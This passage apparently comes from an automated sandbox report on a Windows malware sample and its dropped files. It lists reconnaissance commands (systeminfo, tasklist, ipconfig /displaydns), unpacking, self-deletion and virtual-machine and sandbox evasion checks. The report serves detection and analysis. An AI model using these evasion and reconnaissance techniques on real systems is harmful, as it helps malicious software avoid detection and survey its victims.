Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\ipconfig.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\ROUTE.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\ROUTE.EXE	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\ROUTE.EXE	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\ROUTE.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\systeminfo.exe systeminfo

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv

Source: C:\Windows\SysWOW64\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Unpacked PE file: 0.2.OCYe9qcxiM.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\hehcrfb	Unpacked PE file: 4.2.hehcrfb.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Unpacked PE file: 7.2.4470.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\fihcrfb	Unpacked PE file: 8.2.fihcrfb.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:EW;

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\354F.exe

Code function: 9_2_00007FF780B678EC LoadLibraryA,GetProcAddress,GetCurrentProcess,IsWow64Process,

9_2_00007FF780B678EC

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_004014D9 pushad ; ret	0_2_004014E9
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_004031DB push eax; ret	0_2_004032AB
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_00795033 pushfd ; iretd	0_2_00795034
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_00794536 push B63524ADh; retn 001Fh	0_2_0079456D
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_00796193 push esp; ret	0_2_00796195
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_02161540 pushad ; ret	0_2_02161550
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_004014D9 pushad ; ret	4_2_004014E9
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_004031DB push eax; ret	4_2_004032AB
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_005F1540 pushad ; ret	4_2_005F1550
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_0063E558 pushad ; retf	4_2_0063E5CD
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_0064522B push esp; ret	4_2_0064522D
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_006435CE push B63524ADh; retn 001Fh	4_2_00643605
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_006440CB pushfd ; iretd	4_2_006440CC
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_0040100B push esi; ret	7_2_0040100C
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_0040280E push esp; ret	7_2_004029C6
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_0040281F push esp; ret	7_2_004029C6
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_00402822 push esp; ret	7_2_004029C6
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_00401328 push edi; retf	7_2_0040132A
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_004027ED push esp; ret	7_2_004029C6
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_004027FB push esp; ret	7_2_004029C6
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_006D1313 push edi; retf	7_2_006D1314
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_006D0FFC push esi; ret	7_2_006D0FFD
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_006D2A81 push 9A832F1Fh; iretd	7_2_006D2A87
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_02161909 push esp; iretd	7_2_021619BF
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_02162854 push esp; ret	7_2_02162A2D
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_02162875 push esp; ret	7_2_02162A2D
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_02161072 push esi; ret	7_2_02161073
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_02162862 push esp; ret	7_2_02162A2D
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_02161386 push edi; retf	7_2_02161391
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_02162886 push esp; ret	7_2_02162A2D
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_02162889 push esp; ret	7_2_02162A2D

Source: OCYe9qcxiM.exe	Static PE information: section name: .text entropy: 7.489225566155988
Source: 4470.exe.2.dr	Static PE information: section name: .text entropy: 7.47627388301737
Source: hehcrfb.2.dr	Static PE information: section name: .text entropy: 7.489225566155988
Source: fihcrfb.2.dr	Static PE information: section name: .text entropy: 7.47627388301737

Persistence and Installation Behavior

Uses ipconfig to lookup or modify the Windows network settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns

Drops PE files

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\354F.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\4470.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\fihcrfb	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\hehcrfb	Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\hehcrfb			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\fihcrfb			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\ocye9qcxim.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\hehcrfb:Zone.Identifier read attributes \| delete			Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\fihcrfb:Zone.Identifier read attributes \| delete			Jump to behavior

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hehcrfb	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hehcrfb	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hehcrfb	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hehcrfb	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hehcrfb	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hehcrfb	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fihcrfb	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fihcrfb	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fihcrfb	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fihcrfb	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fihcrfb	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fihcrfb	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Windows\SysWOW64\explorer.exe

Evasive API call chain: CreateMutex,DecisionNodes,Sleep

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\354F.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity WHERE ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}"
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, PNPDeviceID, Manufacturer, Description FROM Win32_PnPEntity WHERE ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}"

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\354F.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapter WHERE PhysicalAdapter=TRUE
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, MACAddress, ProductName, ServiceName, NetConnectionID FROM Win32_NetworkAdapter WHERE PhysicalAdapter=TRUE
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter

Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)

Source: C:\Users\user\AppData\Local\Temp\354F.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_StartupCommand
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, Location, Command FROM Win32_StartupCommand

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	API/Special instruction interceptor: Address: 7FFBCB7AE814
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	API/Special instruction interceptor: Address: 7FFBCB7AD584
Source: C:\Users\user\AppData\Roaming\hehcrfb	API/Special instruction interceptor: Address: 7FFBCB7AE814
Source: C:\Users\user\AppData\Roaming\hehcrfb	API/Special instruction interceptor: Address: 7FFBCB7AD584
Source: C:\Users\user\AppData\Local\Temp\4470.exe	API/Special instruction interceptor: Address: 7FFBCB7AE814
Source: C:\Users\user\AppData\Local\Temp\4470.exe	API/Special instruction interceptor: Address: 7FFBCB7AD584
Source: C:\Users\user\AppData\Roaming\fihcrfb	API/Special instruction interceptor: Address: 7FFBCB7AE814
Source: C:\Users\user\AppData\Roaming\fihcrfb	API/Special instruction interceptor: Address: 7FFBCB7AD584

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: hehcrfb, 00000004.00000002.1809416780.000000000062E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOKR
Source: 4470.exe, 00000007.00000002.2067639306.00000000006BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOK

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 14_2_00C21016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,

14_2_00C21016

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 450	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1872	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 613	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1556	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 891	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 859	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Window / User API: threadDelayed 2564	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 2121	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Window / User API: threadDelayed 3970	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 3963

Found evasive API chain (date check)

Source: C:\Users\user\AppData\Local\Temp\354F.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Found evasive API chain (may stop execution after checking a module file name)

Source: C:\Users\user\AppData\Roaming\fihcrfb	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\user\AppData\Roaming\hehcrfb	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

Found large amount of non-executed APIs

Source: C:\Windows\SysWOW64\explorer.exe	API coverage: 9.8 %
Source: C:\Users\user\AppData\Roaming\hehcrfb	API coverage: 1.0 %
Source: C:\Users\user\AppData\Roaming\fihcrfb	API coverage: 1.0 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\explorer.exe TID: 7568	Thread sleep count: 450 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7576	Thread sleep count: 1872 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7576	Thread sleep time: -187200s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7572	Thread sleep count: 613 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7572	Thread sleep time: -61300s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7792	Thread sleep count: 248 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7800	Thread sleep count: 210 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7796	Thread sleep count: 246 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 8012	Thread sleep count: 86 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 8016	Thread sleep count: 133 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 8020	Thread sleep count: 135 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7576	Thread sleep count: 1556 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7576	Thread sleep time: -155600s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 3684	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 1988	Thread sleep count: 2564 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 1988	Thread sleep time: -2564000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7080	Thread sleep count: 2121 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7080	Thread sleep time: -2121000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 6768	Thread sleep count: 3970 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 6768	Thread sleep time: -3970000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7272	Thread sleep count: 3963 > 30
